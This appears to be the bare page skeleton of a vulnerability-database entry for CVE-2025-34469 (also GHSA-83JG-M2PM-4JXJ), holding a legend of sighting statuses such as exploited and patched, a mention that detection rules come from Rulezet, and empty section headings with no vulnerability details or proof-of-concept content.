Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-34469 (GCVE-0-2025-34469)

FKIE_CVE-2025-34469

GHSA-83JG-M2PM-4JXJ

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature